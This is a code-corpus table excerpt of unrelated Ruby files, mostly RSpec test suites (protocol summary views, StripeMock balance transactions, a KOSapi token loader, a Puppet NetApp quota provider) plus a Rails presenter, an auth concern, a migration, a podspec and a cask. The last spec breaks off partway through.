hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
210c63d19e41d2fd6b2407be0fe00a8aaf5604fa | 600 | class PresenterBase
include ActionView::Helpers::FormTagHelper
include ActionView::Helpers::AssetUrlHelper
include ActionView::Helpers::NumberHelper
include ActionView::Helpers::TranslationHelper
include ActionView::Helpers::UrlHelper
include ActionView::Helpers::TagHelper
include Webpacker::Helper
include ActionView::Context
include ApplicationHelper
include DecoratorHelpers
include Rails.application.routes.url_helpers
private
# This prevents an error with the link_to helper
def controller
nil
end
def safe_html(&block)
block.call.html_safe
end
end
| 24 | 50 | 0.791667 |
1c9382b11dd227f63cc6c69135adf8f25d075e30 | 8,327 | # Copyright © 2011-2016 MUSC Foundation for Research Development~
# All rights reserved.~
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:~
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.~
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following~
# disclaimer in the documentation and/or other materials provided with the distribution.~
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products~
# derived from this software without specific prior written permission.~
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,~
# BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT~
# SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL~
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS~
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR~
# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.~
require 'rails_helper'
RSpec.describe 'dashboard/protocols/summary', type: :view do
def render_summary_for protocol
render 'dashboard/protocols/summary',
protocol: protocol,
protocol_type: protocol.type,
permission_to_edit: true,
user: jug2
end
let_there_be_lane
context 'Protocol is a Study' do
it 'should be titled "Study Summary"' do
protocol = build(:protocol_federally_funded,
:without_validations,
primary_pi: jug2,
type: 'Study',
archived: false,
short_title: 'My Awesome Short Title')
render_summary_for protocol
expect(response).to have_content('Study Summary')
end
it 'should display a "Study Notes" button' do
protocol = build(:protocol_federally_funded,
:without_validations,
primary_pi: jug2,
type: 'Study',
archived: false,
title: 'Study_Title',
short_title: 'Study_Short_Title')
render_summary_for protocol
expect(response).to have_selector('button', text: 'Study Notes')
end
context 'Study has potential funding source' do
it 'should display Study ID, Title, Short Title, and potential funding source' do
protocol = build(:protocol_federally_funded,
:without_validations,
primary_pi: jug2,
type: 'Study',
archived: false,
title: 'My Awesome Full Title',
short_title: 'My Awesome Short Title',
id: 9999,
potential_funding_source: 'federal',
funding_source: 'college',
funding_status: 'pending_funding')
render_summary_for protocol
expect(response).to have_content('9999')
expect(response).to have_content('My Awesome Full Title')
expect(response).to have_content('My Awesome Short Title')
expect(response).to have_content('Potential Funding Source')
expect(response).to have_content('Federal')
end
end
context 'Study has a funding source' do
it 'should display Study ID, Title, Short Title, and potential funding source' do
protocol = build(:protocol_federally_funded,
:without_validations,
primary_pi: jug2,
type: 'Study',
archived: false,
title: 'My Awesome Full Title',
short_title: 'My Awesome Short Title',
id: 9999,
potential_funding_source: 'federal',
funding_source: 'college',
funding_status: 'funded')
render_summary_for protocol
expect(response).to have_content('9999')
expect(response).to have_content('My Awesome Full Title')
expect(response).to have_content('My Awesome Short Title')
expect(response).not_to have_content('Potential Funding Source')
expect(response).to have_content('Funding Source')
expect(response).to have_content('College Department')
end
end
context 'Study is not archived' do
it 'should display the archive button' do
protocol = create(:unarchived_study_without_validations, primary_pi: jug2)
render_summary_for protocol
expect(response).to have_content('Archive Study')
end
end
context 'Study is archived' do
it 'should display the archive button' do
protocol = create(:archived_study_without_validations, primary_pi: jug2)
render_summary_for protocol
expect(response).to have_content('Unarchive Study')
end
end
end
context 'Protocol is a Project' do
it 'should display a "Project Notes" button' do
protocol = build(:protocol_federally_funded,
:without_validations,
primary_pi: jug2,
type: 'Project',
archived: false,
title: 'Project_Title',
short_title: 'Project_Short_Title')
render_summary_for protocol
expect(response).to have_selector('button', text: 'Project Notes')
end
it 'should be titled "Project Summary"' do
protocol = build(:protocol_federally_funded,
:without_validations,
primary_pi: jug2,
type: 'Project',
archived: false,
short_title: 'My Awesome Short Title')
render_summary_for protocol
expect(response).to have_content('Project Summary')
end
context 'Project has potential funding source' do
it 'should display Project ID, Title, Short Title, and potential funding source' do
protocol = build(:protocol_federally_funded,
:without_validations,
primary_pi: jug2,
type: 'Project',
archived: false,
title: 'My Awesome Full Title',
short_title: 'My Awesome Short Title',
id: 9999,
potential_funding_source: 'federal',
funding_source: 'college',
funding_status: 'pending_funding')
render_summary_for protocol
expect(response).to have_content('9999')
expect(response).to have_content('My Awesome Full Title')
expect(response).to have_content('My Awesome Short Title')
expect(response).to have_content('Potential Funding Source')
expect(response).to have_content('Federal')
end
end
context 'Project has a funding source' do
it 'should display Project ID, Title, Short Title, and potential funding source' do
protocol = build(:protocol_federally_funded,
:without_validations,
primary_pi: jug2,
type: 'Project',
archived: false,
title: 'My Awesome Full Title',
short_title: 'My Awesome Short Title',
id: 9999,
potential_funding_source: 'federal',
funding_source: 'college',
funding_status: 'funded')
render_summary_for protocol
expect(response).to have_content('9999')
expect(response).to have_content('My Awesome Full Title')
expect(response).to have_content('My Awesome Short Title')
expect(response).not_to have_content('Potential Funding Source')
expect(response).to have_content('Funding Source')
expect(response).to have_content('College Department')
end
end
context 'Project is not archived' do
it 'should display the archive button' do
protocol = create(:unarchived_project_without_validations, primary_pi: jug2)
render_summary_for protocol
expect(response).to have_content('Archive Project')
end
end
context 'Project is archived' do
it 'should display the archive button' do
protocol = create(:archived_project_without_validations, primary_pi: jug2)
render_summary_for protocol
expect(response).to have_content('Unarchive Project')
end
end
end
end
| 36.845133 | 146 | 0.680557 |
08d6d15e5866deb218f689601a75b17861dcc40f | 140 | class RemoveNotesFromMember < ActiveRecord::Migration
def change
change_table :members do |t|
t.remove :notes
end
end
end
| 17.5 | 53 | 0.707143 |
5d071611c1d29b7a9e3760c6fddf0d0c0b7cd438 | 1,082 | module Auth
def current_user
@current_user ||= User.find_by(auth_token: request.headers["Authorization"])
end
def current_company
@current_company ||= Company.find_by(subdomain: subdomain)
end
def require_company!
render json: { errors: "Unspecified company" }, status: :unauthorized unless current_company.present?
end
def authenticate_with_token!
render json: { errors: "Not authenticated" }, status: :unauthorized unless valid_user_signed_in?
end
def valid_user_signed_in?
current_user.present? && current_company.present? && current_user.company == current_company
end
def subdomain
# here we parse domain and check if it is ourcompany.theirs.com or theircompany.ours.com
# I use a gem due to funkiness around TLDs of various lengths
# domain is currently hardcoded for our production app to have name 'change-me', and local to use lvh.me
host = PublicSuffix.parse(request.host)
if host.sld == "change-me" || host.sld == "lvh"
@subdomain = host.trd
else
@subdomain = host.sld
end
end
end
| 30.914286 | 108 | 0.719963 |
1c5a4577af1837958d17c2a50fcd481178ce4faf | 2,774 | require 'spec_helper'
shared_examples 'Balance Transaction API' do
let(:stripe_helper) { StripeMock.create_test_helper }
it "returns an error if balance transaction does not exist" do
txn_id = 'txn_xxxxxxxxxxxxxxxxxxxxxxxx'
expect {
Stripe::BalanceTransaction.retrieve(txn_id)
}.to raise_error { |e|
expect(e).to be_a(Stripe::InvalidRequestError)
expect(e.message).to eq('No such balance_transaction: ' + txn_id)
}
end
it "retrieves a single balance transaction" do
txn_id = 'txn_05RsQX2eZvKYlo2C0FRTGSSA'
txn = Stripe::BalanceTransaction.retrieve(txn_id)
expect(txn).to be_a(Stripe::BalanceTransaction)
expect(txn.id).to eq(txn_id)
end
describe "listing balance transactions" do
it "retrieves all balance transactions" do
disputes = Stripe::BalanceTransaction.all
expect(disputes.count).to eq(10)
expect(disputes.map &:id).to include('txn_05RsQX2eZvKYlo2C0FRTGSSA','txn_15RsQX2eZvKYlo2C0ERTYUIA', 'txn_25RsQX2eZvKYlo2C0ZXCVBNM', 'txn_35RsQX2eZvKYlo2C0QAZXSWE', 'txn_45RsQX2eZvKYlo2C0EDCVFRT', 'txn_55RsQX2eZvKYlo2C0OIKLJUY', 'txn_65RsQX2eZvKYlo2C0ASDFGHJ', 'txn_75RsQX2eZvKYlo2C0EDCXSWQ', 'txn_85RsQX2eZvKYlo2C0UJMCDET', 'txn_95RsQX2eZvKYlo2C0EDFRYUI')
end
end
it 'retrieves balance transactions for an automated transfer' do
transfer_id = Stripe::Transfer.create({ amount: 2730, currency: "usd" })
# verify transfer currently has no balance transactions
transfer_transactions = Stripe::BalanceTransaction.all({transfer: transfer_id})
expect(transfer_transactions.count).to eq(0)
# verify we can create a new balance transaction associated with the transfer
new_txn_id = stripe_helper.upsert_stripe_object(:balance_transaction, {amount: 12300, transfer: transfer_id})
new_txn = Stripe::BalanceTransaction.retrieve(new_txn_id)
expect(new_txn).to be_a(Stripe::BalanceTransaction)
expect(new_txn.amount).to eq(12300)
# although transfer was specified as an attribute on the balance_transaction, it should not be returned in the object
expect{new_txn.transfer}.to raise_error(NoMethodError)
# verify we can update an existing balance transaction to associate with the transfer
existing_txn_id = 'txn_05RsQX2eZvKYlo2C0FRTGSSA'
existing_txn = Stripe::BalanceTransaction.retrieve(existing_txn_id)
stripe_helper.upsert_stripe_object(:balance_transaction, {id: existing_txn_id, transfer: transfer_id})
# now verify that only these balance transactions are retrieved with the transfer
transfer_transactions = Stripe::BalanceTransaction.all({transfer: transfer_id})
expect(transfer_transactions.count).to eq(2)
expect(transfer_transactions.map &:id).to include(new_txn_id, existing_txn_id)
end
end
| 43.34375 | 361 | 0.769647 |
ac54989aeb41a8aad31b881d67103b3feaec5281 | 103 | module Contact
class ApplicationRecord < ActiveRecord::Base
self.abstract_class = true
end
end
| 17.166667 | 46 | 0.76699 |
e82abdbf99151d98f18ae3583b402fb1297277a1 | 334 | Puppet::Type.type(:neutron_vpnaas_agent_config).provide(
:ini_setting,
:parent => Puppet::Type.type(:openstack_config).provider(:ini_setting)
) do
def self.file_path
'/etc/neutron/vpn_agent.ini'
end
# added for backwards compatibility with older versions of inifile
def file_path
self.class.file_path
end
end
| 20.875 | 72 | 0.745509 |
bb61ca413a33c441e46465cf7a888cb8f6247ebe | 431 | # frozen_string_literal: true
module Heroku
#
# Job that handles background (asynchronous) provisioning.
#
# @raise [Heroku::ProvisioningError] if some provisioning step failed.
#
class ProvisioningJob < ApplicationJob
def perform(resource_id)
resource = Resource.find resource_id
raise Heroku::ProvisioningError unless Heroku::ProvisioningManager::ResourceProvisioner.call(resource)
end
end
end
| 26.9375 | 108 | 0.756381 |
87bb72d270687f95111b69c689b16e62812695fa | 809 | Pod::Spec.new do |s|
s.name = 'iRate'
s.version = '1.6.2'
s.license = 'zlib'
s.summary = 'Alternative to Appirater (prompts users to rate the application) with a simpler interface and support for iOS fast application switching.'
s.description = 'A handy class that prompts users of your iPhone or Mac App Store app to rate your application after using it for a while. Similar to Appirater, but with a simpler, cleaner interface and automatic support for iOS fast application switching.'
s.homepage = 'http://charcoaldesign.co.uk/source/cocoa#irate'
s.author = 'Nick Lockwood'
s.source = { :git => 'https://github.com/nicklockwood/iRate.git', :tag => '1.6.2' }
s.source_files = 'iRate/iRate.{h,m}'
s.resources = 'iRate/iRate.bundle'
end
| 62.230769 | 261 | 0.674907 |
5debeca146c06a9c107eefa503f3d2ef877b036f | 507 | cask 'dragthing' do
version '5.9.17'
sha256 '62d553878267d617aa2be48f09dfc401d08afce216cd42aef7441f4f95dd4cff'
# amazonaws.com/tlasystems was verified as official when first introduced to the cask
url "https://s3.amazonaws.com/tlasystems/DragThing-#{version}.dmg"
appcast 'http://www.dragthing.com/english/download.html',
checkpoint: '2f4f10b7778cbc2ce8198bafdc1e63cd0edb626054926cf25eb20325ea206c6d'
name 'DragThing'
homepage 'http://www.dragthing.com/'
app 'DragThing.app'
end
| 36.214286 | 88 | 0.779093 |
e20db78b4abe8a4a602cd760b8e636a177f857ac | 837 | # Be sure to restart your server when you modify this file.
# Add new inflection rules using the following format. Inflections
# are locale specific, and you may define rules for as many different
# locales as you wish. All of these examples are active by default:
# ActiveSupport::Inflector.inflections(:en) do |inflect|
# inflect.plural /^(ox)$/i, '\1en'
# inflect.singular /^(ox)en/i, '\1'
# inflect.irregular 'person', 'people'
# inflect.uncountable %w( fish sheep )
# end
# These inflection rules are supported but not enabled by default:
# ActiveSupport::Inflector.inflections(:en) do |inflect|
# inflect.acronym 'RESTful'
# end
ActiveSupport::Inflector.inflections do |inflect|
inflect.irregular 'qualificacao', 'qualificacoes'
inflect.irregular 'receita', 'receitas'
inflect.irregular 'franquia', 'franquias'
end
| 36.391304 | 69 | 0.744325 |
edaa47c9c857608cca7c2fc759a46fd549057d3f | 48 | module ObzidianViewTool
VERSION = "0.1.0"
end
| 12 | 23 | 0.729167 |
016b5f89b0667272cc136ab0e82014fcb8a4f737 | 1,309 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 2018_07_18_212541) do
# These are extensions that must be enabled in order to support this database
enable_extension "plpgsql"
create_table "calls", force: :cascade do |t|
t.string "from", null: false
t.string "to", null: false
t.string "status", null: false
t.string "call_control_id", null: false
t.string "call_leg_id", null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.string "direction"
t.index ["call_control_id"], name: "index_calls_on_call_leg_id"
end
end
| 42.225806 | 86 | 0.754775 |
6268ef13a07c5537c32c6147799ef2d5eb1f6f62 | 405 | # boolean_and - class BooleanA - implements && operatornd
class BooleanAnd
def initialize(left, right, line_number = 0)
@left = left
@right = right
@line_number = line_number
end
attr_reader :line_number
def call(env:, frames:)
@left.call(env: env, frames: frames) &&
@right.call(env: env, frames: frames)
end
def to_s
@left.to_s + ' && ' + @right.to_s
end
end
| 20.25 | 57 | 0.641975 |
628505e22efc5ef924d2dba65ef83abcb5b7d897 | 749 | # frozen_string_literal: true
module Stupidedi
module Versions
module FunctionalGroups
module FortyTen
module SegmentDefs
s = Schema
e = ElementDefs
r = ElementReqs
PLD = s::SegmentDef.build(:PLD, "Pallet Information",
"To specify pallet information including quantity, exchange, and weight",
e::E406 .simple_use(r::Mandatory, s::RepeatCount.bounded(1)),
e::E399 .simple_use(r::Optional, s::RepeatCount.bounded(1)),
e::E188 .simple_use(r::Relational, s::RepeatCount.bounded(1)),
e::E81 .simple_use(r::Relational, s::RepeatCount.bounded(1)),
SyntaxNotes::P.build(3, 4))
end
end
end
end
end
| 28.807692 | 85 | 0.602136 |
f7a4a30c0e3b9c6a6cb99df9f2317a892d8bc283 | 4,496 | RSpec.describe KOSapiCLI::KOSapiTokenLoader do
let(:broken) do
{ 'broken' => { 'env' => 'file' } }
end
let(:valid) do
{ 'config' => { 'client_token' => { 'access_token' => 'fas4f68sef486sef4',
'refresh_token' => '',
'expires_at' => (Time.now.to_i + 1000),
'token_type' => 'bearer',
'scope' => 'cvut:kosapi:read' } } }
end
let(:invalid) do
{ 'config' => { 'client_token' => { 'access_token' => 'fas4f68sef486sef4',
'refresh_token' => '',
'expires_at' => (Time.now.to_i - 1000),
'token_type' => 'bearer',
'scope' => 'cvut:kosapi:read' } } }
end
let(:config) do
KOSapiCLI::Configuration.new(env_file: '/tmp/.kosapi_cli.env')
end
subject(:loader) do
KOSapiCLI::KOSapiTokenLoader.new(config)
end
describe '#restore_token' do
context '.kosapi_cli.env does not file exist' do
it 'should try to read from .env file' do
expect(File).to receive(:open).with(config.env_file, 'r')
loader.restore_token
end
it 'should return nil if env file does not exist' do
expect(loader.restore_token).to be_nil
end
end
context '.kosapi_cli.env does exists but contains not valid data' do
before(:each) { write_yaml_env(config.env_file, broken) }
after(:each) { File.delete(config.env_file) }
it 'should read from .env file' do
expect(File).to receive(:open).with(config.env_file, 'r')
loader.restore_token
end
it 'should return nil if env file is broken' do
expect(loader.restore_token).to be_nil
end
end
context 'valid token in .kosapi_cli.env file' do
before(:each) { write_yaml_env(config.env_file, valid) }
after(:each) { File.delete(config.env_file) }
it 'should read from .env file' do
expect(File).to receive(:open).with(config.env_file, 'r')
loader.restore_token
end
it 'should return hash' do
expect(loader.restore_token).to be_a Hash
end
it 'should contain stored data' do
expect(loader.restore_token).to eq valid['config']['client_token']
end
end
context 'invalid token in .kosapi_cli.env file' do
before(:each) { write_yaml_env(config.env_file, invalid) }
after(:each) { File.delete(config.env_file) }
it 'should read from .env file' do
expect(File).to receive(:open).with(config.env_file, 'r')
loader.restore_token
end
it 'should return nil if token is not valid' do
expect(loader.restore_token).to be_nil
end
end
end
describe '#store_token' do
context '.kosapi_cli.env does not exists' do
it 'should read and write into env file' do
expect(File).to receive(:open).with(config.env_file, 'r')
expect(File).to receive(:open).with(config.env_file, 'w')
loader.store_token(valid['config']['client_token'])
end
it 'should create env file' do
expect(File.file?(config.env_file)).to be false
loader.store_token(valid['config']['client_token'])
expect(File.file?(config.env_file)).to be true
end
it 'should store data that was given' do
loader.store_token(valid['config']['client_token'])
test = {}
File.open(config.env_file, 'r') do |f|
test = YAML.safe_load(f)
end
expect(valid['config']['client_token']).to eq(test['config']['client_token'])
end
end
context '.kosapi_cli.env does already exists' do
before(:each) { write_yaml_env(config.env_file, valid) }
after(:each) { File.delete(config.env_file) }
it 'should read and write into env file' do
expect(File).to receive(:open).with(config.env_file, 'r')
expect(File).to receive(:open).with(config.env_file, 'w')
loader.store_token(valid['config']['client_token'])
end
it 'should store data that was given' do
loader.store_token(valid['config']['client_token'])
test = {}
File.open(config.env_file, 'r') do |f|
test = YAML.safe_load(f)
end
expect(valid['config']['client_token']).to eq(test['config']['client_token'])
end
end
end
end
| 33.552239 | 85 | 0.581628 |
ac182e8b45737731d684b7dbee671505c19365bb | 246 | FactoryBot.define do
factory :telemetry_engine_spool, class: 'Telemetry::Engine::Spool' do
association :engine, factory: :telemetry_engine
sequence :number
n { rand }
rotational_velocity { Unit.new n * 30000, 'rpm' }
end
end
| 24.6 | 71 | 0.707317 |
4a415b42a0810a31b7bb171eee4645a4cea8dddd | 16,091 | #! /usr/bin/env ruby
require 'spec_helper'
require 'yaml'
require 'puppet/util/network_device/netapp/NaServer'
describe Puppet::Type.type(:netapp_quota).provider(:sevenmode) do
# let(:resource) do
# {
# :ensure => :present,
# :name => '/vol/vol1/qtree1',
# :provider => described_class.name
# }
# end
# let(:provider) { resource.provider }
before :each do
#described_class.stubs(:suitable?).returns true
#Puppet::Type.type(:netapp_quota).stubs(:sevenmode).returns described_class
provider.stubs(:suitable?).returns true
Puppet::Type.type(:netapp_quota).stubs(:defaultprovider).returns provider
end
let(:parameters) do
{ :name => '/vol/vol1/qtree1' }
end
let(:resource) do
Puppet::Type.type(:netapp_quota).new(parameters.merge({
:provider => described_class.name
}))
end
let(:provider) do
resource.provider
# described_class.new(
# :name => '/vol/vol1/qtree1'
# )
end
let(:tree_quota_parameters) do
{
:name => '/vol/vol1/qtree1',
:ensure => :present,
:volume => 'vol1',
:type => :tree,
}
end
let(:user_quota_parameters) do
{
:name => 'bob',
:ensure => :present,
:volume => 'vol1',
:qtree => 'qtree1',
:type => :user,
}
end
let(:group_quota_parameters) do
{
:name => 'staff',
:ensure => :present,
:volume => 'vol1',
:qtree => 'qtree1',
:type => :group,
}
end
# let :tree_quota do
# Puppet::Type.type(:netapp_quota).new(
# :name => '/vol/vol1/qtree1',
# :ensure => :present,
# :volume => 'vol1',
# :type => :tree,
# :provider => provider
# )
# end
# let :user_quota do
# Puppet::Type.type(:netapp_quota).new(
# :name => 'bob',
# :ensure => :present,
# :volume => 'vol1',
# :qtree => 'qtree1',
# :type => :user,
# :provider => provider
# )
# end
# let :group_quota do
# Puppet::Type.type(:netapp_quota).new(
# :name => 'staff',
# :ensure => :present,
# :volume => 'vol1',
# :qtree => 'qtree1',
# :type => :group,
# :provider => provider
# )
# end
describe "#size_in_byte" do
it "should convert a value with no unit to an integer" do
described_class.size_in_byte("1024").should == 1024
end
it "should convert a value specified in KiB (unit=K)" do
described_class.size_in_byte("100K").should == 102400
end
it "should convert a value specified in MiB (unit=M)" do
described_class.size_in_byte("3M").should == 3145728
end
it "should convert a value specified in GiB (unit=G)" do
described_class.size_in_byte("20G").should == 21474836480
end
it "should convert a value specified in TiB (unit=T)" do
described_class.size_in_byte("4T").should == 4398046511104
end
it "should raise an error on negative values" do
expect { described_class.size_in_byte("-20") }.to raise_error(ArgumentError, 'Invalid input "-20"')
end
it "should raise an error for unknown units" do
expect { described_class.size_in_byte("3R") }.to raise_error(ArgumentError, 'Invalid input "3R"')
end
it "should raise an error on non numeric values" do
expect { described_class.size_in_byte("G") }.to raise_error(ArgumentError, 'Invalid input "G"')
end
end
describe "#instances" do
it "should return an array of current quota entries" do
described_class.expects(:list).with('include-output-entry', 'true').returns YAML.load_file(my_fixture('quota-list-entries.yml'))
instances = described_class.instances
instances.size.should == 3
instances.map do |prov|
{
:name => prov.get(:name),
:ensure => prov.get(:ensure),
:qtree => prov.get(:qtree),
:type => prov.get(:type),
:disklimit => prov.get(:disklimit),
:softdisklimit => prov.get(:softdisklimit),
:filelimit => prov.get(:filelimit),
:softfilelimit => prov.get(:softfilelimit),
:threshold => prov.get(:threshold),
:volume => prov.get(:volume)
}
end.should == [
{
:name => '/vol/FILER01P_vol1/some-share',
:ensure => :present,
:qtree => :absent,
:type => :tree,
:disklimit => 5368709120, # 5G
:softdisklimit => :absent,
:filelimit => :absent,
:softfilelimit => :absent,
:threshold => :absent,
:volume => 'FILER01P_vol1'
},
{
:name => '/vol/vol3/some_other-share',
:ensure => :present,
:qtree => :absent,
:type => :tree,
:disklimit => 200 * 1024 * 1024, # 200M
:softdisklimit => :absent,
:filelimit => :absent,
:softfilelimit => :absent,
:threshold => :absent,
:volume => 'vol3'
},
{
:name => 'bob',
:ensure => :present,
:qtree => 'bob_h',
:type => :user,
:disklimit => 100*1024*1024, # 100M
:softdisklimit => 90*1024*1024, # 90M
:filelimit => 10240, # 10K
:softfilelimit => 9*1024, # 9K
:threshold => 90*1024*1024, # 90M
:volume => 'home'
}
]
end
end
context 'on a tree quota' do
let(:parameters) do
tree_quota_parameters
end
describe "when asking exists?" do
it "should return true if resource is present" do
resource.provider.set(:ensure => :present)
resource.provider.should be_exists
end
it "should return false if resource is absent" do
resource.provider.set(:ensure => :absent)
resource.provider.should_not be_exists
end
end
describe "when creating a resource" do
it "should be able to create a tree resource" do
resource.provider.expects(:add).with('quota-target', '/vol/vol1/qtree1', 'quota-type', 'tree', 'volume', 'vol1', 'qtree', '')
resource.provider.create
end
{
:disklimit => 'disk-limit',
:softdisklimit => 'soft-disk-limit',
:threshold => 'threshold'
}.each do |limit_property, api_property|
describe "with a #{limit_property}" do
{
'absent' => '-',
'300K' => '300',
'20M' => '20480',
'3G' => '3145728',
'1T' => '1073741824'
}.each do |limit_value, api_value|
it "should pass #{api_value} if desired value is #{limit_value}" do
resource[limit_property] = limit_value
resource.provider.expects(:add).with('quota-target', '/vol/vol1/qtree1', 'quota-type', 'tree', 'volume', 'vol1', 'qtree', '', api_property, api_value)
resource.provider.create
end
end
end
end
{
:filelimit => 'file-limit',
:softfilelimit => 'soft-file-limit'
}.each do |limit_property, api_property|
describe "with a #{limit_property}" do
{
'absent' => '-',
'300' => '300',
'2K' => '2048',
'30M' => '31457280',
'5G' => '5368709120',
'1T' => '1099511627776'
}.each do |limit_value, api_value|
it "should pass #{api_value} if desired value is #{limit_value}" do
resource[limit_property] = limit_value
resource.provider.expects(:add).with('quota-target', '/vol/vol1/qtree1', 'quota-type', 'tree', 'volume', 'vol1', 'qtree', '', api_property, api_value)
resource.provider.create
end
end
end
end
end
end
describe "when destroying a resource" do
context "on a tree quota" do
let(:parameters) do
tree_quota_parameters
end
it "should be able to destroy it" do
# if we destroy a provider, we must have been present before so we must have values in @property_hash
resource.provider.set(:type => :tree, :volume => 'vol1')
resource.provider.expects(:del).with('quota-target', '/vol/vol1/qtree1', 'quota-type', 'tree', 'volume', 'vol1', 'qtree', '')
resource.provider.destroy
end
end
context "on a user quota" do
let(:parameters) do
user_quota_parameters
end
it "should be able to destroy it" do
# if we destroy a provider, we must have been present before so we must have values in @property_hash
resource.provider.set(:name => 'bob', :type => :user, :volume => 'vol1', :qtree => 'q1')
resource.provider.expects(:del).with('quota-target', 'bob', 'quota-type', 'user', 'volume', 'vol1', 'qtree', 'q1')
resource.provider.destroy
end
end
describe "on a group quota" do
let(:parameters) do
group_quota_parameters
end
it "should be able to destroy it" do
# if we destroy a provider, we must have been present before so we must have values in @property_hash
resource.provider.set(:name => 'staff', :type => :group, :volume => 'vol1', :qtree => 'q1')
resource.provider.expects(:del).with('quota-target', 'staff', 'quota-type', 'group', 'volume', 'vol1', 'qtree', 'q1')
resource.provider.destroy
end
end
end
describe "when querying the current value of a property" do
{
:type => :tree,
:volume => 'vol1',
:qtree => 'qtree1',
:disklimit => 500,
:softdisklimit => 300,
:filelimit => 100,
:softfilelimit => 50,
:threshold => 20
}.each do |property, sample_value|
describe "for #{property}" do
it "should get the cached value if possible" do
provider.set(property => sample_value)
provider.send(property).should == sample_value
end
it "should return absent otherwise" do
provider.send(property).should == :absent
end
end
end
end
describe "when modifying a property" do
[:type, :volume, :qtree].each do |immutable_prop|
describe immutable_prop do
it "should not allow setting #{immutable_prop}" do
expect { provider.send("#{immutable_prop}=", "some_value") }.to raise_error(Puppet::Error, /Please perform the necessary steps manually/)
end
end
end
{
:disklimit => 'disk-limit',
:softdisklimit => 'soft-disk-limit',
:threshold => 'threshold'
}.each do |property, apiproperty|
describe property do
context "on a user quota" do
let(:parameters) do
user_quota_parameters
end
require 'pry'
binding.pry
it "should pass \"-\" as a value for #{apiproperty} if desired value is absent" do
resource.provider.set(:name => 'bob', :type => :user, :qtree => 'qtree01', :volume => 'vol01')
resource.provider.expects(:mod).with('quota-target', 'bob', 'quota-type', 'user', 'volume', 'vol01', 'qtree', 'qtree01', apiproperty, '-')
resource.provider.send("#{property}=", :absent)
end
it "should convert value to KB if desired value is numeric" do
resource.provider.set(:name => 'bob', :type => :user, :qtree => 'qtree01', :volume => 'vol01')
resource.provider.expects(:mod).with('quota-target', 'bob', 'quota-type', 'user', 'volume', 'vol01', 'qtree', 'qtree01', apiproperty, '102400')
resource.provider.send("#{property}=", 104857600) # 100MB
end
end
context "on a tree quota" do
let(:parameters) do
tree_quota_parameters
end
it "should pass \"\" as a qtree for tree quotas" do
resource.provider.set(:name => '/vol/vol1/qtree1', :type => :tree, :volume => 'vol3')
resource.provider.expects(:mod).with('quota-target', '/vol/vol1/qtree1', 'quota-type', 'tree', 'volume', 'vol3', 'qtree', '', apiproperty, '4')
resource.provider.send("#{property}=", 4096)
end
end
end
end
{
:filelimit => 'file-limit',
:softfilelimit => 'soft-file-limit'
}.each do |property, apiproperty|
describe property do
context "on a user quota" do
let(:parameters) do
user_quota_parameters
end
it "should pass \"-\" parameters for #{apiproperty} if desired value is absent" do
resource.provider.set(:name => 'bob', :type => :user, :qtree => 'qtree01', :volume => 'vol01')
resource.provider.expects(:mod).with('quota-target', 'bob', 'quota-type', 'user', 'volume', 'vol01', 'qtree', 'qtree01', apiproperty, '-')
resource.provider.send("#{property}=", :absent)
end
it "should pass the desired value if desired value is numeric" do
resource.provider.set(:name => 'bob', :type => :user, :qtree => 'qtree01', :volume => 'vol01')
resource.provider.expects(:mod).with('quota-target', 'bob', 'quota-type', 'user', 'volume', 'vol01', 'qtree', 'qtree01', apiproperty, '104857600')
resource.provider.send("#{property}=", 104857600) # 100M
end
end
context "on a tree quota" do
let(:parameters) do
tree_quota_parameters
end
it "should pass \"\" as a qtree for tree quotas" do
resource.provider.set(:name => '/vol/vol1/qtree1', :type => :tree, :volume => 'vol3')
resource.provider.expects(:mod).with('quota-target', '/vol/vol1/qtree1', 'quota-type', 'tree', 'volume', 'vol3', 'qtree', '', apiproperty, '4096')
resource.provider.send("#{property}=", 4096)
end
end
end
end
end
describe "#flush" do
let :quota_on do
YAML.load_file(my_fixture('quota-status-result-on.yml'))
end
let :quota_off do
YAML.load_file(my_fixture('quota-status-result-off.yml'))
end
describe "when a complete reload is not necessary" do
it "should call resize if quota is activated for that volume" do
provider.set(:volume => 'vol01')
provider.expects(:status).with('volume', 'vol01').returns quota_on
provider.expects(:resize).with('volume', 'vol01')
provider.expects(:qoff).never
provider.expects(:qon).never
provider.flush
end
it "should do nothing if quota is deactivated for that volume" do
provider.set(:volume => 'vol01')
provider.expects(:status).with('volume', 'vol01').returns quota_off
provider.expects(:resize).never
provider.expects(:qoff).never
provider.expects(:qon).never
provider.flush
end
end
describe "when a complete reload is necessary" do
before :each do
provider.instance_variable_set(:@need_restart, true)
end
it "should turn quota off and back on if quota is activated for that volume" do
